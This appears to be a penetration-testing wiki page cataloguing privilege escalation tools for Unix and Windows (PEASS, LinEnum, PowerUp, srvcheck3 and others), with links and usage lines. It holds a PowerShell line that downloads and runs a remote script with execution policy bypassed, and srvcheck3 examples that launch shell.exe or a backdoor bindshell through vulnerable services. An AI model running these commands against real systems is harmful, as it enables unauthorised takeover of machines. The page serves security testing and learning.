Automated tools
Tools which will make your life easier in a search for privilege escalation paths
Summary
Name
Unix
Windows
Solaris
Mac
PEASS
sh
exe and bat
-
sh
BeRoot
py
exe
-
py
Unix privesc check
sh
-
-
-
Windows Exploit Suggester
-
systeminfo
-
-
Linux Exploit Suggester
perl
-
-
-
Solaris Exploit Suggester
-
-
showrev
-
LinEnum
sh
-
-
-
Nishang
-
PS
-
-
SharpUp
-
exe
-
-
Seatbelt
-
exe
-
-
JAWS
-
PS
-
-
Watson
-
exe
-
-
PowerUp
-
PS
-
-
srvcheck3
-
exe
-
-
PEASS
PEASS - Privilege Escalation Awesome Scripts SUITE
Link: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/README.md
These tools search for possible local privilege escalation paths that you could exploit and print them to you with nice colors so you can recognize the misconfigurations easily.
Check the Local Windows Privilege Escalation checklist from book.hacktricks.xyz
WinPEAS - Windows local Privilege Escalation Awesome Script (C#.exe and .bat)
Check the Local Linux Privilege Escalation checklist from book.hacktricks.xyz
LinPEAS - Linux local Privilege Escalation Awesome Script (.sh)
BeRoot
BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege. It has been added to the pupy project as a post exploitation module (so it will be executed in memory without touching the disk).
Link: https://github.com/AlessandroZ/BeRoot
Windows pre compiled versions: https://github.com/AlessandroZ/BeRoot/releases
Linux: https://github.com/AlessandroZ/BeRoot/tree/master/Linux
Unix privesc check
Unix-privesc-checker is a script that runs on Unix systems (tested on Solaris 9, HPUX 11, Various Linuxes, FreeBSD 6.2). It tries to find misconfigurations that could allow local unprivileged users to escalate privileges to other users or to access local apps (e.g. databases).
Link: https://github.com/pentestmonkey/unix-privesc-check
Usage:
$ ./unix-privesc-check > output.txt
Windows-Exploit-Suggester
This tool compares a targets patch levels against the Microsoft vulnerability database in order to detect potential missing patches on the target. It also notifies the user if there are public exploits and Metasploit modules available for the missing bulletins.
It requires the 'systeminfo' command output from a Windows host in order to compare that the Microsoft security bulletin database and determine the patch level of the host.
USAGE:
update the database :
feed it "systeminfo" input, and point it to the microsoft database
$ ./windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo win7sp1-systeminfo.txt
Linux Exploit Suggester
When run without arguments, the script performs a 'uname -r' to grab the Linux operating system release version, and returns a list of possible exploits. Links to CVEs and applicable exploit POCs are included. Keep in mind that a patched/back-ported patch may fool this script.
Usage:
$ ./linux-exploit-suggester.pl
Solaris Exploit suggester
This tool reads the output of “showrev -p” on Solaris machines and outputs a list of exploits that you might want to try. It currently focusses on local exploitation of Solaris 8 on SPARC, but other version of Solaris are partially supported.
Link:
http://pentestmonkey.net/tools/audit/exploit-suggester
Example Output:
Running:
LinEnum
Link: https://github.com/rebootuser/LinEnum
Scripted Local Linux Enumeration & Privilege Escalation Checks
version 0.982
Example:
./LinEnum.sh -s -k keyword -r report -e /tmp/ -t
OPTIONS:
-k Enter keyword
-e Enter export location
-t Include thorough (lengthy) tests
-s Supply current user password to check sudo perms (INSECURE)
-r Enter report name
-h Displays this help text
Running with no options = limited scans/no output file
Nishang
Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming. Nishang is useful during all phases of penetration testing.
Link: https://github.com/samratashok/nishang
Also installed by default on Kali:
root@kali:~# ls -l /usr/share/nishang/
Escalation scripts:
Enable-DuplicateToken – When SYSTEM privileges are required.
Remove-Update – Introduce vulnerabilities by removing patches.
Invoke-PsUACme – Bypass UAC.
SharpUp
SharpUp is a C# port of various PowerUp functionality. Currently, only the most common checks have been ported; no weaponization functions have yet been implemented.
Link: https://github.com/GhostPack/SharpUp
Usage:
Seatbelt
Seatbelt is a C# project that performs a number of security oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives.
Usage
SeatBelt.exe
all will run ALL enumeration checks, can be combined with full.
SeatBelt.exe [CheckName]
full will prevent any filtering and will return complete results.
SeatBelt.exe [CheckName] [CheckName2] ...
will run one or more specified checks only (case-sensitive naming!)
SeatBelt.exe system collects the following system data:
SeatBelt.exe user collects the following user data:
Non-default collection options:
JAWS
JAWS - Just Another Windows (Enum) Script
JAWS is PowerShell script designed to help penetration testers (and CTFers) quickly identify potential privilege escalation vectors on Windows systems. It is written using PowerShell 2.0 so 'should' run on every Windows version since Windows 7.
Link: GitHub - 411Hall/JAWS: JAWS - Just Another Windows (Enum) Script
Usage:
Run from within CMD shell and write out to file.
CMD C:\temp> powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1 -OutputFilename JAWS-Enum.txt
Run from within CMD shell and write out to screen.
CMD C:\temp> powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1
Run from within PS Shell and write out to file.
PS C:\temp> .\jaws-enum.ps1 -OutputFileName Jaws-Enum.txt
Watson
Watson is a .NET tool designed to enumerate missing KBs and suggest exploits for Privilege Escalation vulnerabilities.
Link: GitHub - rasta-mouse/Watson: Enumerate missing KBs and...
Usage:
PowerUp
Cheat sheet: https://github.com/HarmJ0y/CheatSheets/blob/master/PowerUp.pdf
Download and run:
powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks
For all checks:
PS C:\Users\mssql-svc\appdata\local\temp> Invoke-AllChecks
srvcheck3
Privilege escalation for Windows XP SP2 and before
This can exploit vulnerable services. http://seclists.org/fulldisclosure/2006/Feb/231
Example:
srvcheck3.exe -m upnphost -H 127.0.0.1 -c "cmd.exe /c c:\Inetpub\wwwroot\shell.exe"
View menu:
D:\Programación\srvcheck2>srvcheck
3.exe -?
examples:
Srvcheck3.exe -l
(list local vulnerabilities)
Srvcheck3.exe -l -H 192.168.1.1-192.168.1.255 -u domainuser -p domainpass
Srvcheck3.exe -l -f hosts.txt -u DOMAINuser -p password
(list remote vulnerabilities)
Srvcheck3.exe -m service -H host -c "cmd.exe /c md c:\PWNED"
Srvcheck3.exe -m vulnservice -H 192.168.1.200 -u domainuser -p domainpass -r 192.168.1.1 21 backdoor.exe
(exe cutes backdoor.exe bindshell)
Last updated